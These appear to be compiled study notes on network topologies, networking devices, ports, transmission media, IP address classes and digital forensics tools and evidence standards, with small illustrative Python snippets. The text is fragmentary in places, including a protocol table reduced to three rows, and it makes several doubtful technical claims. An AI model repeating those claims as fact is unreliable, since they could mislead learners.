A common example of star topology is a local area network (LAN) in an office where all
computers are connected to a central hub. This topology is also used in wireless networks
where all devices are connected to a wireless access point.
For more, refer to the Advantages and Disadvantages of Star Topology.
Bus Topology
Bus Topology is a network type in which every computer and network device is
connected to a single cable. It is bi-directional. It is a multi-point connection and a non-
robust topology because if the backbone fails the topology crashes. In Bus Topology,
various MAC (Media Access Control) protocols are followed by LAN ethernet
connections like TDMA, Pure Aloha, CDMA, Slotted Aloha, etc.
Bus Topology
Figure 3: A bus topology with shared backbone cable. The nodes are connected to the
channel via drop lines.
Advantages of Bus Topology
If N devices are connected to each other in a bus topology, then the number of cables
required to connect them is 1, known as backbone cable, and N drop lines are
required.
Coaxial or twisted pair cables are mainly used in bus-based networks that support up
to 10 Mbps.
The cost of the cable is less compared to other topologies, but it is used to build small
networks.
Bus topology is familiar technology as installation and troubleshooting techniques are
well known.
CSMA is the most common method for this type of topology.
Drawbacks of Bus Topology
A bus topology is quite simple, but it still requires a lot of cabling.
If the common cable fails, then the whole system will crash down.
If the network traffic is heavy, it increases collisions in the network. To avoid this,
various protocols are used in the MAC layer known as Pure Aloha, Slotted Aloha,
CSMA/CD, etc.
Adding new devices to the network would slow down networks.
Security is very low.
A common example of bus topology is the Ethernet LAN, where all devices are
connected to a single coaxial cable or twisted pair cable. This topology is also used in
cable television networks. For more, refer to the Advantages and Disadvantages of Bus
Topology.
Ring Topology
In a Ring Topology, the devices form a ring, with each device connected to exactly two neighboring devices. A number of repeaters are used in a ring topology with a large number of nodes, because if someone wants to send data to the last node in a ring of 100 nodes, the data will have to pass through 99 nodes to reach the 100th node. Hence, to prevent data loss, repeaters are used in the network.
The data flows in one direction, i.e. it is unidirectional, but it can be made bidirectional by having two connections between each network node; this is called Dual Ring Topology. In Ring Topology, the token passing protocol is used by the workstations to transmit the data.
Ring Topology
Figure 4: A ring topology comprising 4 stations connected with each other, forming a ring.
The most common access method of ring topology is token passing.
Token passing: It is a network access method in which a token is passed from one
node to another node.
Token: It is a frame that circulates around the network.
Operations of Ring Topology
1. One station is known as a monitor station which takes all the responsibility for
performing the operations.
2. To transmit the data, the station has to hold the token. After the transmission is done,
the token is to be released for other stations to use.
3. When no station is transmitting the data, then the token will circulate in the ring.
4. There are two types of token release techniques: Early token release releases the
token just after transmitting the data and Delayed token release releases the token
after the acknowledgment is received from the receiver.
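A toy Python simulation of token passing, in which a station may transmit only while holding the token (the station names and pending frames are hypothetical):

from itertools import cycle

# Toy token-passing ring: the token circulates; a station transmits only
# while it holds the token, then releases it to its neighbour.
stations = ["A", "B", "C", "D"]
wants_to_send = {"B": "hello", "D": "world"}   # hypothetical pending frames

ring = cycle(stations)
for _ in range(len(stations)):
    holder = next(ring)                        # token arrives at this station
    frame = wants_to_send.pop(holder, None)
    if frame:
        print(f"{holder} holds the token and transmits: {frame}")
    else:
        print(f"{holder} has nothing to send; token passes on")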
Advantages of Ring Topology
The data transmission is high-speed.
The possibility of collision is minimum in this type of topology.
Cheap to install and expand.
It is less costly than a star topology.
Drawbacks of Ring Topology
The failure of a single node in the network can cause the entire network to fail.
Troubleshooting is difficult in this topology.
The addition of stations in between or the removal of stations can disturb the whole
topology.
Less secure.
For more, refer to the Advantages and Disadvantages of Ring Topology.
Tree Topology
This topology is a variation of the star topology and has a hierarchical flow of data. In Tree Topology, protocols like DHCP and SAC (Standard Automatic Configuration) are used.
Tree Topology
Figure 5: The various secondary hubs are connected to the central hub, which contains the repeater. Data flows from top to bottom, i.e. from the central hub to the secondary hubs and then to the devices, or from bottom to top, i.e. from the devices to the secondary hubs and then to the central hub. It is a multi-point connection and a non-robust topology, because if the backbone fails the topology crashes.
Advantages of Tree Topology
It allows more devices to be attached to a single central hub, thus decreasing the distance traveled by the signal to reach the devices.
It allows parts of the network to be isolated and prioritized from different computers.
We can add new devices to the existing network.
Error detection and error correction are very easy in a tree topology.
Drawbacks of Tree Topology
If the central hub fails, the entire system fails.
The cost is high because of the cabling.
If new devices are added, it becomes difficult to reconfigure.
A common example of a tree topology is the hierarchy in a large organization. At the top
of the tree is the CEO, who is connected to the different departments or divisions (child
nodes) of the company. Each department has its own hierarchy, with managers
overseeing different teams (grandchild nodes). The team members (leaf nodes) are at the
bottom of the hierarchy, connected to their respective managers and departments.
For more, refer to the Advantages and Disadvantages of Tree Topology.
Hybrid Topology
This topological technology is the combination of all the various types of topologies we
have studied above. Hybrid Topology is used when the nodes are free to take any form. It
means these can be individuals such as Ring or Star topology or can be a combination of
various types of topologies seen above. Each individual topology uses the protocol that
has been discussed earlier.
Hybrid Topology
Figure 6: The above figure shows the structure of the Hybrid topology. As seen it
contains a combination of all different types of networks.
Advantages of Hybrid Topology
This topology is very flexible.
The size of the network can be easily expanded by adding new devices.
Drawbacks of Hybrid Topology
It is challenging to design the architecture of the Hybrid Network.
Hubs used in this topology are very expensive.
The infrastructure cost is very high as a hybrid network requires a lot of cabling and
network devices.
A common example of a hybrid topology is a university campus network. The network
may have a backbone of a star topology, with each building connected to the backbone
through a switch or router. Within each building, there may be a bus or ring topology
connecting the different rooms and offices. The wireless access points also create a mesh
topology for wireless devices. This hybrid topology allows for efficient communication
between different buildings while providing flexibility and redundancy within each
building.
For more, refer to the Advantages and Disadvantages of Hybrid Topology.
b) Devices
Network Devices: Network devices, also known as networking hardware, are physical devices that allow hardware on a computer network to communicate and interact with one another, for example repeaters, hubs, bridges, switches, routers, gateways, brouters, and NICs.
1. Repeater – A repeater operates at the physical layer. Its job is to regenerate the signal over the same network before the signal becomes too weak or corrupted, so as to extend the length over which the signal can be transmitted on the same network. An important point to be noted about repeaters is that they do not merely amplify the signal: when the signal becomes weak, they copy it bit by bit and regenerate it at its original strength. It is a 2-port device.
2. Hub – A hub is basically a multi-port repeater. A hub connects multiple wires coming
different stations. Hubs cannot filter data, so data packets are sent to all connected
devices. In other words, the collision domain of all hosts connected through Hub remains
one. Also, they do not have the intelligence to find out the best path for data packets
which leads to inefficiencies and wastage.
Types of Hub
Active Hub:- These are the hubs that have their own power supply and can clean, boost, and relay the signal along the network. It serves both as a repeater as well as a
wiring center. These are used to extend the maximum distance between nodes.
Passive Hub:- These are the hubs that collect wiring from nodes and power supply
from the active hub. These hubs relay signals onto the network without cleaning and
boosting them and can’t be used to extend the distance between nodes.
Intelligent Hub:- It works like an active hub and includes remote management
capabilities. They also provide flexible data rates to network devices. It also enables
an administrator to monitor the traffic passing through the hub and to configure each
port in the hub.
3. Bridge – A bridge operates at the data link layer. A bridge is a repeater with the added functionality of filtering content by reading the MAC addresses of the source and destination. It is also used for interconnecting two LANs working on the same protocol. It has a single input and a single output port, thus making it a 2-port device.
Types of Bridges
Transparent Bridges:- These are the bridge in which the stations are completely
unaware of the bridge’s existence i.e. whether or not a bridge is added or deleted from
the network, reconfiguration of the stations is unnecessary. These bridges make use of
two processes i.e. bridge forwarding and bridge learning.
Source Routing Bridges:- In these bridges, routing operation is performed by the
source station and the frame specifies which route to follow. The host can discover
the frame by sending a special frame called the discovery frame, which spreads
through the entire network using all possible paths to the destination.
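The bridge forwarding and bridge learning processes mentioned above can be sketched with a simple table mapping each learned source MAC address to a port (the addresses and port numbers are hypothetical):

# Toy "bridge learning": note which port each source MAC was seen on,
# then forward frames only to the learned port (or flood when the
# destination is still unknown).
mac_table = {}

def handle_frame(src_mac, dst_mac, in_port):
    mac_table[src_mac] = in_port               # learn the source's port
    out = mac_table.get(dst_mac)
    if out is None:
        print(f"{dst_mac} unknown: flood to all ports except {in_port}")
    elif out != in_port:
        print(f"forward frame to port {out}")
    else:
        print("destination on same segment: filter (drop)")

handle_frame("aa:aa", "bb:bb", 1)   # bb:bb unknown -> flood
handle_frame("bb:bb", "aa:aa", 2)   # aa:aa was learned on port 1 -> forward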
4. Switch – A switch is a multiport bridge with a buffer and a design that can boost its
efficiency(a large number of ports imply less traffic) and performance. A switch is a data
link layer device. The switch can perform error checking before forwarding data, which
makes it very efficient as it does not forward packets that have errors and forward good
packets selectively to the correct port only. In other words, the switch divides the
collision domain of hosts, but the broadcast domain remains the same.
Types of Switch
1. Unmanaged switches: These switches have a simple plug-and-play design and do not
offer advanced configuration options. They are suitable for small networks or for use
as an expansion to a larger network.
2. Managed switches: These switches offer advanced configuration options such as
VLANs, QoS, and link aggregation. They are suitable for larger, more complex
networks and allow for centralized management.
3. Smart switches: These switches have features similar to managed switches but are
typically easier to set up and manage. They are suitable for small- to medium-sized
networks.
4. Layer 2 switches: These switches operate at the Data Link layer of the OSI model and
are responsible for forwarding data between devices on the same network segment.
5. Layer 3 switches: These switches operate at the Network layer of the OSI model and
can route data between different network segments. They are more advanced than
Layer 2 switches and are often used in larger, more complex networks.
6. PoE switches: These switches have Power over Ethernet capabilities, which allows
them to supply power to network devices over the same cable that carries data.
7. Gigabit switches: These switches support Gigabit Ethernet speeds, which are faster
than traditional Ethernet speeds.
8. Rack-mounted switches: These switches are designed to be mounted in a server rack
and are suitable for use in data centers or other large networks.
9. Desktop switches: These switches are designed for use on a desktop or in a small
office environment and are typically smaller in size than rack-mounted switches.
10. Modular switches: These switches have a modular design, which allows for easy expansion or customization. They are suitable for large networks and data centers.
5. Routers – A router is a device like a switch that routes data packets based on their IP
addresses. The router is mainly a Network Layer device. Routers normally connect LANs
and WANs and have a dynamically updating routing table based on which they make
decisions on routing the data packets. The router divides the broadcast domains of hosts
connected through it.
6. Gateway – A gateway, as the name suggests, is a passage to connect two networks that may work upon different networking models. Gateways work as messenger agents that take data from one system, interpret it, and transfer it to another system. Gateways are also called protocol converters and can operate at any network layer. They are generally more complex than switches or routers.
7. Brouter – Also known as a bridging router, this device combines the features of both a bridge and a router. It can work either at the data link layer or at the network layer. Working as a router, it is capable of routing packets across networks; working as a bridge, it is capable of filtering local area network traffic.
8. NIC – A NIC, or network interface card, is a network adapter used to connect a computer to a network. It is installed in the computer to establish a LAN. It has a unique ID written on a chip, and it has a connector for attaching the cable. The cable acts as an interface between the computer and the router or modem. The NIC works on both the physical and data link layers of the network model.
c) Protocols and Ports
40 Network Protocol Names and Port Numbers with Their Transport Protocols and Meanings, tabulated by Precious Ocansey (HND, Network Engineer).
Network protocols are the languages and rules used during communication in a computer network. There are two major transport protocols, namely TCP and UDP.
UDP, which stands for User Datagram Protocol, is part of the TCP/IP suite of protocols used for data transfer. UDP is known as a connectionless protocol, meaning it doesn't acknowledge that the packets being sent have been received. For this reason, the UDP protocol is typically used for streaming media: while you might see skips in video or hear some fuzz in audio clips, UDP transmission prevents the playback from stopping completely.
TCP, on the other hand, includes built-in error checking, which means it has more overhead and is therefore slower than UDP, but it ensures accurate delivery of data between systems. Therefore, TCP is used for transferring most types of data, such as web pages and files, over the local network or the Internet. UDP is ideal for media streaming, which does not require all packets to be delivered.
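The difference shows up directly in the sockets API: a UDP socket can send a datagram immediately, while a TCP socket must first establish a connection. A minimal Python sketch (127.0.0.1:9999 is a hypothetical endpoint; the TCP connect fails unless a server is actually listening there):

import socket

# UDP: connectionless -- a datagram is sent without any handshake and
# without knowing whether anyone receives it.
udp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udp.sendto(b"frame of a video stream", ("127.0.0.1", 9999))
udp.close()

# TCP: connection-oriented -- a handshake must succeed before any data
# flows, and delivery is acknowledged and error-checked.
tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    tcp.connect(("127.0.0.1", 9999))
    tcp.sendall(b"a web page that must arrive intact")
except ConnectionRefusedError:
    print("no TCP server listening on 127.0.0.1:9999")
finally:
    tcp.close()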
Port Numbers: They are the unique numeric identifiers assigned to each protocol so that the corresponding service can be addressed easily.
Below are the network protocols, their port numbers, and their transport protocols, as written by Precious Ocansey.

No.  Protocol                                     Port(s)      Transport     Meaning
8.   Dynamic Host Configuration Protocol (DHCP)   67 and 68    UDP           It is a kind of service used in the client and server model.
13.  Simple Network Management Protocol (SNMP)    161 and 162  TCP and UDP   It has the ability to monitor, configure and control network devices.
34.  Remote Procedure Call Protocol (RPC)         –            TCP and UDP   It is a protocol for requesting a service from a program located in a remote computer through a network.
d) Communication Media
Different means are used for transmitting data from one source to another. The two forms of communication media are:
1. Analog
Some of the common examples of analog media are conventional radios,
land-line telephones, VCRs, television transmissions, etc.
2. Digital
All in all, such communication media act as channels: they link various sources to pass information, messages, or data. Let us now go through the types of communication media based upon the method of communication:
1. Television
2. Radio
3. Print
4. Internet
The Internet is the largest and most popular type of communication media. Almost anything can be searched on the internet, which gives the audience access to all the relevant information they seek.
5. Outdoor Media
Such forms of mass media revolve around signs, placards, billboards, etc that
are used inside or outside of vehicles, shops, commercial buildings, stadiums,
etc.
Unshielded Twisted Pair (UTP):
Advantages:
⇢ Least expensive
⇢ Easy to install
⇢ High-speed capacity
Disadvantages:
⇢ Susceptible to external interference
⇢ Lower capacity and performance in comparison to STP
⇢ Short distance transmission due to attenuation
Applications:
Used in telephone connections and LAN networks
Shielded Twisted Pair (STP):
This type of cable consists of a special jacket (a copper braid covering or a
foil shield) to block external interference. It is used in fast-data-rate Ethernet
and in voice and data channels of telephone lines.
Advantages:
⇢ Better performance at a higher data rate in comparison to UTP
⇢ Eliminates crosstalk
⇢ Comparatively faster
Disadvantages:
⇢ Comparatively difficult to install and manufacture
⇢ More expensive
⇢ Bulky
Applications:
The shielded twisted pair type of cable is most frequently used in extremely cold
climates, where the additional layer of outer covering makes it perfect for
withstanding such temperatures or for shielding the interior components.
(ii) Coaxial Cable –
It has an outer plastic covering containing an insulation layer made of PVC or Teflon and two concentric conductors, each having a separate insulated protection cover. The coaxial cable transmits information in two modes: baseband mode (the cable bandwidth is dedicated to a single channel) and broadband mode (the cable bandwidth is split into separate ranges). Cable TV and analog television networks widely use coaxial cables.
Advantages:
High Bandwidth
Better noise Immunity
Easy to install and expand
Inexpensive
Disadvantages:
Single cable failure can disrupt the entire network
Applications:
Radio frequency signals are sent over coaxial wire. It can be used for cable
television signal distribution, digital audio (S/PDIF), computer network
connections (like Ethernet), and feedlines that connect radio transmitters and
receivers to their antennas.
(iii) Optical Fiber Cable –
It uses the total internal reflection of light through a core made up of glass or plastic. The core is surrounded by a less dense glass or plastic covering called the cladding. It is used for the transmission of large volumes of data. The cable can be unidirectional or bidirectional, and WDM (Wavelength Division Multiplexing) supports both the unidirectional and bidirectional modes.
Advantages:
Increased capacity and bandwidth
Lightweight
Less signal attenuation
Immunity to electromagnetic interference
Resistance to corrosive materials
Disadvantages:
Difficult to install and maintain
High cost
Fragile
Applications:
Medical Purpose: Used in several types of medical instruments.
Defence Purpose: Used in transmission of data in aerospace.
For Communication: This is largely used in formation of internet cables.
Industrial Purpose: Used for lighting purposes and safety measures in
designing the interior and exterior of automobiles.
(iv) Stripline
Stripline is a transverse electromagnetic (TEM) transmission line medium
invented by Robert M. Barrett of the Air Force Cambridge Research Centre in
the 1950s. Stripline is the earliest form of planar transmission line. It uses a conducting material to transmit high-frequency waves and is also called a waveguide. This conducting material is sandwiched between two layers of ground plane, which are usually shorted together to provide EMI immunity.
(v) Microstripline
In this, the conducting material is separated from the ground plane by a layer of
dielectric.
2. Unguided Media:
It is also referred to as Wireless or Unbounded transmission media. No physical
medium is required for the transmission of electromagnetic signals.
Features:
The signal is broadcasted through air
Less Secure
Used for larger distances
There are 3 types of Signals transmitted through unguided media:
(i) Radio waves –
These are easy to generate and can penetrate through buildings. The sending and receiving antennas need not be aligned. Frequency range: 3 kHz – 1 GHz. AM and FM radios and cordless phones use radio waves for transmission.
Further Categorized as (i) Terrestrial and (ii) Satellite.
(ii) Microwaves –
It is a line-of-sight transmission, i.e. the sending and receiving antennas need to be properly aligned with each other. The distance covered by the signal is directly proportional to the height of the antenna. Frequency range: 1 GHz – 300 GHz. These are majorly used for mobile phone communication and television distribution.
(iii) Infrared –
Infrared waves are used for very short-distance communication. They cannot penetrate through obstacles, which prevents interference between systems. Frequency range: 300 GHz – 400 THz. Infrared is used in TV remotes, wireless mice, keyboards, printers, etc.
6. IP address
a) types
What is an IP Address?
An IP address is a numerical label assigned to the devices connected to a computer network that uses the IP for communication. An IP address acts as an identifier for a specific machine on a particular network. It also helps you to establish a virtual connection between a source and a destination.
Types of IP address
There are mainly four types of IP addresses: public, private, static, and dynamic. Public and private addresses are classified by their location relative to the network: a private IP address is used inside a network, while a public IP address is used outside a network.
Public IP Addresses
A public IP address is one primary address associated with your whole network; from the outside, each of the connected devices appears under the same public IP address.
Private IP Addresses
Within the network, each connected device has its own private IP address. This likely includes Bluetooth devices such as printers, smart devices such as TVs, and so on. With the rising industry of internet of things (IoT) products, the number of private IP addresses you are likely to have in your own home is growing.
Dynamic IP Addresses
Dynamic IP addresses keep changing. They are temporary and are allocated to a device each time it connects to the web. Dynamic IPs trace their origin to a pool of IP addresses that is shared across many computers.
Static IP Addresses
A static IP address is one that does not change on its own. In contrast, a dynamic IP address is assigned by a Dynamic Host Configuration Protocol (DHCP) server and is subject to change. A static IP address never changes automatically, though it can be altered as part of routine network administration.
Shared IP Addresses:
A shared IP address is used by small business websites that do not yet get many visitors or have many files or pages on their site. The IP address is not unique to one site; it is shared with other websites.
Dedicated IP Addresses:
A dedicated IP address is assigned uniquely to each website. A dedicated IP address helps you avoid potential blacklists caused by bad behavior from others on your server. It also gives you the option of pulling up your website using the IP address alone, instead of your domain name, and helps you access your website while you are waiting on a domain transfer.
Versions of IP address
There are two versions of IP addresses: IPv4 and IPv6.
IPv4
IPv4 was the first version of IP. It was deployed for production in the ARPANET in 1983 and is still the most widely used IP version. It identifies devices on a network using a 32-bit addressing system.
IPv6
IPv6 is the most recent version of the Internet Protocol. The Internet Engineering Task Force (IETF) initiated work on it in early 1994, and the design and development of that suite is now called IPv6. This new version is being deployed to fulfill the need for more Internet addresses and to resolve the issues associated with IPv4. With a 128-bit address space, it allows about 340 undecillion unique addresses.
b) classes
What is an IP Address?
An IP (Internet Protocol) address is a numerical label assigned to the
devices connected to a computer network that uses the IP for
communication.
Parts of an IP address
An IP address is divided into two parts:
Prefix: The prefix part of an IP address identifies the physical network to which the computer is attached. The prefix is also known as the network address.
Suffix: The suffix part identifies the individual computer on the network. The suffix is also called the host address.
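A brief sketch of the prefix/suffix split (Python's standard ipaddress module; the address is the document's later Class B example, paired with its natural /16 mask purely for illustration):

    import ipaddress

    iface = ipaddress.ip_interface("168.212.226.204/16")
    print(iface.network.network_address)                # 168.212.0.0 -> the prefix
    print(int(iface.ip) & int(iface.network.hostmask))  # 58060 -> the suffix (226*256 + 204)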
IP Header Classes:
Class A – Address range 1.0.0.0 to 126.255.255.255; subnet mask 255.0.0.0; leading bit 0. Used for networks with a large number of hosts.
Class B – Address range 128.0.0.0 to 191.255.255.255; subnet mask 255.255.0.0; leading bits 10. Used for medium-sized networks.
Class C – Address range 192.0.0.0 to 223.255.255.255; subnet mask 255.255.255.0; leading bits 110. Used for local area networks.
Class D – Address range 224.0.0.0 to 239.255.255.255; no subnet mask; leading bits 1110. Reserved for multicasting.
Class E – Address range 240.0.0.0 to 255.255.255.254; no subnet mask; leading bits 1111. This class is reserved for research and development purposes.
An IP address works much like a postal address. The address of your area is a group address for all the houses that belong to a specific area, while the house address is the unique address of your home within that area (here, the area is represented by a PIN code). In the same way, the network address comprises all hosts that belong to a specific network, and the host address is the unique address of a particular host in that network.
What is Classful Addressing?
Classful addressing is the network addressing architecture used on the Internet from 1981 until Classless Inter-Domain Routing (CIDR) was introduced in 1993.
Class A Network
This IP address class is used when there are a large number of hosts. In a Class A network, the first 8 bits (the first octet) identify the network, and the remaining 24 bits identify the host within that network.
Class B Network
In a Class B IP address, the binary address starts with 10, so the first decimal number can be between 128 and 191. The number 127 is reserved for loopback, which is used for internal testing on the local machine. The first 16 bits (two octets) identify the network; the remaining 16 bits indicate the host within the network. An example of a Class B IP address is 168.212.226.204, where 168.212 identifies the network and 226.204 identifies the host on that network.
Class C Network
Class C is a type of IP address used for small networks. In this class, three octets are used to identify the network, and the first octet ranges between 192 and 223. The first two bits are set to 1 and the third bit is set to 0, which makes the first 24 bits of the address the network address and the remaining 8 bits the host address. Local area networks mostly use Class C IP addresses to connect to the network. Example: 192.168.178.1
Class D Network
Class D addresses are only used for multicasting applications and never for regular networking operations. In this class, the first three bits are set to 1 and the fourth bit is set to 0. Class D addresses are 32-bit network addresses, and all the values within the range are used to identify multicast groups uniquely. Example: 224.0.0.1
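The class rules above can be summarised in a few lines of code. A minimal sketch (Python; the helper name ipv4_class is our own, not a standard function):

    def ipv4_class(address: str) -> str:
        first_octet = int(address.split(".")[0])
        if first_octet < 128:   # leading bit 0 (127 is the loopback range)
            return "A"
        if first_octet < 192:   # leading bits 10
            return "B"
        if first_octet < 224:   # leading bits 110
            return "C"
        if first_octet < 240:   # leading bits 1110 (multicast)
            return "D"
        return "E"              # leading bits 1111 (reserved)

    print(ipv4_class("10.1.1.1"), ipv4_class("168.212.226.204"), ipv4_class("224.0.0.1"))
    # -> A B D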
Summary:
An IP (Internet Protocol) address is a numerical label assigned to
the devices connected to a computer network that uses the IP for
communication.
IP Address is divided into two parts: 1) Prefix 2)Suffix
An IP address works in a network like a postal address. For example, a postal address combines two addresses: the address of your area and your house address.
In a class A type of network, the first 8 bits (also called the first
octet) identify the network, and the remaining have 24 bits for the
host into that network.
In class B type of network, the first 16 bits (known as two octets)
help you identify the network. The other remaining 16 bits
indicate the host within the network.
In class C, three octets are used to identify the network, and the first octet ranges between 192 and 223.
Class D addresses are 32-bit network addresses. All the values
within the range are used to identify multicast groups uniquely.
Class E IP address is defined by including the starting four
network address bits as 1.
The major drawback of IP address classes is the risk of running
out of address space soon.
An important rule for assigning a network ID is that it cannot start with 127, as this number belongs to the Class A range and is reserved for internal loopback functions.
unit 3
1. Discuss
a)Basic principles of digital forensics
Digital forensics is a field that involves the recovery and investigation
of digital data for use in legal proceedings. The data may be
recovered from a computer system, a mobile device, or any other
digital storage media.
The analysis of evidence may involve the use of specialized tools and
techniques, such as file carving, data recovery, and metadata
analysis. The forensic analyst must also be able to interpret the data
collected and provide a report on their findings.
Principle 4: Documentation of Evidence
The fourth principle of digital forensics is the documentation of
evidence. The documentation of evidence involves documenting the
steps taken during the investigation and the results obtained. The
forensic analyst must keep a detailed record of their findings and
provide a report on their analysis of the data collected.
Conclusion
Digital forensics is the method of analyzing a computer system after an attack has taken place and looking for evidence. The digital forensic process consists of five steps, the first of which is Identification: finding evidence on electronic devices and saving the data to a safe drive.
Juniper researchers estimated that cybercrime would cost businesses over 2 trillion USD by 2019. As costs go up, so too does the demand for digital forensic experts. Tools are a forensic examiner's best friend – using the right tool helps to move things faster, improve productivity and gather all the evidence.
Whether it's for an internal human resources case, an investigation into unauthorized
access to a server, or if you just want to learn a new skill, these suites and utilities will
help you conduct memory forensic analysis, hard drive forensic analysis, forensic
image exploration, forensic imaging and mobile forensics. As such, they all provide the
ability to bring back in-depth information about what's 'under the hood' of a system.
1. SIFT Workstation
SIFT (SANS investigative forensic toolkit) Workstation is a freely-available virtual appliance
that is configured in Ubuntu 14.04. SIFT contains a suite of forensic tools needed to perform a
detailed digital forensic examination. It is one of the most popular open-source incident
response platforms.
2. Autopsy
Autopsy is a GUI-based open-source digital forensic programme for analysing hard drives and smartphones efficiently. Autopsy is used by thousands of users worldwide to investigate what happened on a computer.
Autopsy was designed to be an end-to-end platform, with modules that come out of the box and others that are available from third parties. Some of the modules provide timeline analysis, keyword searching, data carving, and extraction of Indicators of Compromise using STIX.
3. FTK Imager
FTK Imager is a data preview and imaging tool used to acquire data (evidence) in a
forensically sound manner by creating copies of data without making changes to the original
evidence. It saves an image of a hard disk, in one file or in segments, which may be
reconstructed later on. It calculates MD5 hash values and confirms the integrity of the data
before closing the files.
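A minimal sketch of that hash-verification idea (Python; the file name evidence.dd and the recorded digest are illustrative placeholders, not values from the original text — this is the general technique, not FTK Imager's implementation):

    import hashlib

    def file_md5(path: str, chunk_size: int = 1 << 20) -> str:
        digest = hashlib.md5()
        with open(path, "rb") as f:
            while chunk := f.read(chunk_size):   # hash in chunks: images can be huge
                digest.update(chunk)
        return digest.hexdigest()

    recorded_at_acquisition = "9e107d9d372bb6826bd81d3542a419d6"  # placeholder value
    assert file_md5("evidence.dd") == recorded_at_acquisition, "image has changed!"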
4. DEFT
DEFT is a household name when it comes to digital forensics and intelligence activities. The DEFT Linux distribution is made up of a GNU/Linux system and DART (Digital Advanced Response Toolkit), a suite dedicated to digital forensics and intelligence activities. On boot, the system does not use the swap partitions of the system being analysed, and no automatic mount scripts run during system startup.
5. Volatility
Also built into SIFT, Volatility is an open-source memory forensics framework for incident
response and malware analysis. It is written in Python and supports Microsoft Windows, Mac
OS X, and Linux (as of version 2.5).
Forensic analysis of a raw memory dump can be performed on a Windows platform. The Volatility tool is used to determine whether the PC is infected; if so, the malicious programme can be extracted from the running processes in the memory dump.
6. LastActivityView
LastActivityView is a tool for the Windows operating system that collects information from
various sources on a running system, and displays a log of actions made by the user and events
that occurred on this computer.
The activity displayed by LastActivityView includes: Running an .exe file, opening open/save
dialog-box, opening file/folder from Explorer or other software, software installation, system
shutdown/start, application or system crash and network connection and disconnection.
7. HxD
HxD is a carefully designed and fast hex editor which, in addition to raw disk editing and
modifying of main memory (RAM), handles files of any size. The easy-to-use interface offers
features such as searching and replacing, exporting, checksums/digests, insertion of byte
patterns, a file shredder, concatenation or splitting of files, statistics and much more.
8. CAINE
CAINE offers a complete forensic environment that is organised to integrate existing software
tools as software modules and to provide a friendly graphical interface. This is a digital
forensics platform and graphical interface to the Sleuth Kit and other digital forensics tools.
9. Redline
Redline is a free endpoint security tool that provides host investigative capabilities to users to
find signs of malicious activity through memory and file analysis and the development of a
threat assessment profile.
Redline can help audit and collect all running processes and drivers from memory, file-system
metadata, registry data, event logs, network information, services, tasks and web history; and
analyse and view imported audit data, including the ability to filter results around a given
timeframe.
10. PlainSight
PlainSight is a versatile computer forensics environment that allows you to perform forensic
operations such as: getting hard disk and partition information, extracting user and group
information, examining Windows firewall configuration, examining physical memory dumps,
extracting LanMan password hashes and previewing a system before acquiring it.
This is by no means an extensive list and may not cover everything you need for an investigation, but it is a great starting point to becoming a forensic examiner.
Once you have identified the evidence, the next crucial step is to preserve the information on it (a sketch of this workflow follows the list):
1. Make copies of the relevant data so you can work from them rather than the original.
2. Consider using a write blocker. A write blocker is a hardware restriction that allows forensics analysts to read data without changing it.
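A minimal sketch of the copy-and-verify workflow (Python; the file names are illustrative placeholders, and this shows only the general idea, not any particular tool's implementation):

    import hashlib
    import shutil

    def sha256_of(path: str) -> str:
        h = hashlib.sha256()
        with open(path, "rb") as f:
            for chunk in iter(lambda: f.read(1 << 20), b""):
                h.update(chunk)
        return h.hexdigest()

    # Duplicate the evidence, then confirm the copy matches the original
    # before any analysis touches it.
    shutil.copy2("original_evidence.img", "working_copy.img")  # preserves timestamps
    assert sha256_of("original_evidence.img") == sha256_of("working_copy.img")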
3. Analysis
Now that you’ve preserved the evidence, you can begin analysing it. You’ll
use this information to determine how the cyber criminal breached the system
and what data they stole, modified or wiped.
A Digital Forensics Analyst may, for example, use techniques such as file carving, data recovery and metadata analysis to conduct this analysis.
4. Documentation
As you document your findings, avoid assumptions and ensure your
conclusions are verifiable and accurate. If you make a mistake during
documentation, it could be used to prove that your evidence is untrustworthy!
Digital Forensic Analysts take precautions, such as keeping detailed and verifiable records of every step, to ensure the evidence holds up in a court case.
5. Presentation
Presenting your investigation’s findings is the final step of the process.
You should present findings without bias and in chronological order. Be
thorough, accurate and verify your conclusions throughout the investigation. If
you are presenting in court, your evidence is more likely to hold up and crack
the case!
6. Data acquisition
Logical acquisition
Logical acquisition involves collecting files that are specifically related to the case under
investigation. This technique is typically used when an entire drive or network is too large to be
copied.
Sparse acquisition
Sparse acquisition is similar to logical acquisition, but it also collects fragments of unallocated (deleted) data; it is used when it is not necessary to inspect the entire drive.
standards
Principle 1
In order to ensure that digital evidence is collected, preserved, examined, or transferred in a manner
safeguarding the accuracy and reliability of the evidence, law enforcement and forensic
organizations must establish and maintain an effective quality system. Standard Operating
Procedures (SOPs) are documented quality-control guidelines that must be supported by proper
case records and use broadly accepted procedures, equipment, and materials.
Discussion. The use of SOPs is fundamental to both law enforcement and forensic science.
Guidelines that are consistent with scientific and legal principles are essential to the acceptance of
results and conclusions by courts and other agencies. The development and implementation of
these SOPs must be under an agency’s management authority.
Discussion. Rapid technological changes are the hallmark of digital evidence, with the types,
formats, and methods for seizing and examining digital evidence changing quickly. In order to
ensure that personnel, training, equipment, and procedures continue to be appropriate and effective,
management must review and update SOP documents annually.
Discussion. Because a variety of scientific procedures may validly be applied to a given problem,
standards and criteria for assessing procedures need to remain flexible. The validity of a procedure
may be established by demonstrating the accuracy and reliability of specific techniques. In the digital
evidence area, peer review of SOPs by other agencies may be useful.
Discussion. Procedures should set forth their purpose and appropriate application. Required
elements such as hardware and software must be listed and the proper steps for successful use
should be listed or discussed. Any limitations in the use of the procedure or the use or interpretation
of the results should be established. Personnel who use these procedures must be familiar with
them and have them available for reference.
Discussion. Although many acceptable procedures may be used to perform a task, considerable
variation among cases requires that personnel have the flexibility to exercise judgment in selecting a
method appropriate to the problem.
Hardware used in the seizure and/or examination of digital evidence should be in good operating
condition and be tested to ensure that it operates correctly. Software must be tested to ensure that it
produces reliable results for use in seizure and/or examination purposes.
All activity relating to the seizure, storage, examination, or transfer of digital evidence must be
recorded in writing and be available for review and testimony.
Discussion. In general, documentation to support conclusions must be such that, in the absence of
the originator, another competent person could evaluate what was done, interpret the data, and
arrive at the same conclusions as the originator.
The requirement for evidence reliability necessitates a chain of custody for all items of evidence.
Chain-of-custody documentation must be maintained for all digital evidence.
Case notes and records of observations must be of a permanent nature. Handwritten notes and
observations must be in ink, not pencil, although pencil (including color) may be appropriate for
diagrams or making tracings. Any corrections to notes must be made by an initialed, single strikeout;
